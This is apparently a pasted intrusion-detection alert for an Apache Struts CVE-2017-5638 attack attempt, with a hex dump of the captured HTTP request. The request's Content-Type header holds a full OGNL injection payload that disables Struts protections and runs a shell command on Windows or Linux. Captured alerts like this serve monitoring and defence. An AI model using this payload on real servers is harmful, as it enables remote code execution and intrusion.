woah - woah - see see gone bad -
ount:2 Event#3.474105 2017-03-23 15:18:28
ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638)
a.b.c.d -> e.f.g.h
IPVer=4 hlen=5 tos=0 dlen=1086 ID=0 flags=0 offset=0 ttl=0 chksum=883
Protocol: 6 sport=45509 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=1319 chksum=0
Payload:
47 45 54 20 2F 66 72 61 6D 65 2F 66 69 72 73 74 GET /frame/first
2E 61 63 74 69 6F 6E 20 48 54 54 50 2F 31 2E 31 .action HTTP/1.1
0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F ..User-Agent: Mo
7A 69 6C 6C 61 2F 35 2E 30 20 28 4D 61 63 69 6E zilla/5.0 (Macin
74 6F 73 68 3B 20 49 6E 74 65 6C 20 4D 61 63 20 tosh; Intel Mac
4F 53 20 58 20 31 30 5F 31 32 5F 33 29 20 41 70 OS X 10_12_3) Ap
70 6C 65 57 65 62 4B 69 74 2F 35 33 37 2E 33 36 pleWebKit/537.36
20 28 4B 48 54 4D 4C 2C 20 6C 69 6B 65 20 47 65 (KHTML, like Ge
63 6B 6F 29 20 43 68 72 6F 6D 65 2F 35 36 2E 30 cko) Chrome/56.0
2E 32 39 32 34 2E 38 37 20 53 61 66 61 72 69 2F .2924.87 Safari/
35 33 37 2E 33 36 0D 0A 48 6F 73 74 3A 20 37 34 537.36..Host: 74
2E 39 34 2E 36 37 2E 31 39 36 0D 0A 41 63 63 65 .94.67.196..Acce
70 74 3A 20 2A 2F 2A 0D 0A 43 6F 6E 74 65 6E 74 pt: */*..Content
2D 54 79 70 65 3A 20 25 7B 28 23 6E 69 6B 65 3D -Type: %{(#nike=
27 6D 75 6C 74 69 70 61 72 74 2F 66 6F 72 6D 2D 'multipart/form-
64 61 74 61 27 29 2E 28 23 64 6D 3D 40 6F 67 6E data').(#dm=@ogn
6C 2E 4F 67 6E 6C 43 6F 6E 74 65 78 74 40 44 45 l.OgnlContext@DE
46 41 55 4C 54 5F 4D 45 4D 42 45 52 5F 41 43 43 FAULT_MEMBER_ACC
45 53 53 29 2E 28 23 5F 6D 65 6D 62 65 72 41 63 ESS).(#_memberAc
63 65 73 73 3F 28 23 5F 6D 65 6D 62 65 72 41 63 cess?(#_memberAc
63 65 73 73 3D 23 64 6D 29 3A 28 28 23 63 6F 6E cess=#dm):((#con
74 61 69 6E 65 72 3D 23 63 6F 6E 74 65 78 74 5B tainer=#context[
27 63 6F 6D 2E 6F 70 65 6E 73 79 6D 70 68 6F 6E 'com.opensymphon
79 2E 78 77 6F 72 6B 32 2E 41 63 74 69 6F 6E 43 y.xwork2.ActionC
6F 6E 74 65 78 74 2E 63 6F 6E 74 61 69 6E 65 72 ontext.container
27 5D 29 2E 28 23 6F 67 6E 6C 55 74 69 6C 3D 23 ']).(#ognlUtil=#
63 6F 6E 74 61 69 6E 65 72 2E 67 65 74 49 6E 73 container.getIns
74 61 6E 63 65 28 40 63 6F 6D 2E 6F 70 65 6E 73 tance(@com.opens
79 6D 70 68 6F 6E 79 2E 78 77 6F 72 6B 32 2E 6F ymphony.xwork2.o
67 6E 6C 2E 4F 67 6E 6C 55 74 69 6C 40 63 6C 61 gnl.OgnlUtil@cla
73 73 29 29 2E 28 23 6F 67 6E 6C 55 74 69 6C 2E ss)).(#ognlUtil.
67 65 74 45 78 63 6C 75 64 65 64 50 61 63 6B 61 getExcludedPacka
67 65 4E 61 6D 65 73 28 29 2E 63 6C 65 61 72 28 geNames().clear(
29 29 2E 28 23 6F 67 6E 6C 55 74 69 6C 2E 67 65 )).(#ognlUtil.ge
74 45 78 63 6C 75 64 65 64 43 6C 61 73 73 65 73 tExcludedClasses
28 29 2E 63 6C 65 61 72 28 29 29 2E 28 23 63 6F ().clear()).(#co
6E 74 65 78 74 2E 73 65 74 4D 65 6D 62 65 72 41 ntext.setMemberA
63 63 65 73 73 28 23 64 6D 29 29 29 29 2E 28 23 ccess(#dm)))).(#
63 6D 64 3D 27 6E 4D 61 73 6B 43 75 73 74 6F 6D cmd='nMaskCustom
4D 75 74 74 4D 6F 6C 6F 7A 27 29 2E 28 23 69 73 MuttMoloz').(#is
77 69 6E 3D 28 40 6A 61 76 61 2E 6C 61 6E 67 2E win=(@java.lang.
53 79 73 74 65 6D 40 67 65 74 50 72 6F 70 65 72 System@getProper
74 79 28 27 6F 73 2E 6E 61 6D 65 27 29 2E 74 6F ty('os.name').to
4C 6F 77 65 72 43 61 73 65 28 29 2E 63 6F 6E 74 LowerCase().cont
61 69 6E 73 28 27 77 69 6E 27 29 29 29 2E 28 23 ains('win'))).(#
63 6D 64 73 3D 28 23 69 73 77 69 6E 3F 7B 27 63 cmds=(#iswin?{'c
6D 64 2E 65 78 65 27 2C 27 2F 63 27 2C 23 63 6D md.exe','/c',#cm
64 7D 3A 7B 27 2F 62 69 6E 2F 62 61 73 68 27 2C d}:{'/bin/bash',
27 2D 63 27 2C 23 63 6D 64 7D 29 29 2E 28 23 70 '-c',#cmd})).(#p
3D 6E 65 77 20 6A 61 76 61 2E 6C 61 6E 67 2E 50 =new java.lang.P
72 6F 63 65 73 73 42 75 69 6C 64 65 72 28 23 63 rocessBuilder(#c
6D 64 73 29 29 2E 28 23 70 2E 72 65 64 69 72 65 mds)).(#p.redire
63 74 45 72 72 6F 72 53 74 72 65 61 6D 28 74 72 ctErrorStream(tr
75 65 29 29 2E 28 23 70 72 6F 63 65 73 73 3D 23 ue)).(#process=#
70 2E 73 74 61 72 74 28 29 29 2E 28 23 72 6F 73 p.start()).(#ros
3D 28 40 6F 72 67 2E 61 70 61 63 68 65 2E 73 74 =(@org.apache.st
72 75 74 73 32 2E 53 65 72 76 6C 65 74 41 63 74 ruts2.ServletAct
69 6F 6E 43 6F 6E 74 65 78 74 40 67 65 74 52 65 ionContext@getRe
73 70 6F 6E 73 65 28 29 2E 67 65 74 4F 75 74 70 sponse().getOutp
75 74 53 74 72 65 61 6D 28 29 29 29 2E 28 40 6F utStream())).(@o
72 67 2E 61 70 61 63 68 65 2E 63 6F 6D 6D 6F 6E rg.apache.common
73 2E 69 6F 2E 49 4F 55 74 69 6C 73 40 63 6F 70 s.io.IOUtils@cop
79 28 23 70 72 6F 63 65 73 73 2E 67 65 74 49 6E y(#process.getIn
70 75 74 53 74 72 65 61 6D 28 29 2C 23 72 6F 73 putStream(),#ros
29 29 2E 28 23 72 6F 73 2E 66 6C 75 73 68 28 29 )).(#ros.flush()
29 7D 0D 0A 0D 0A )}....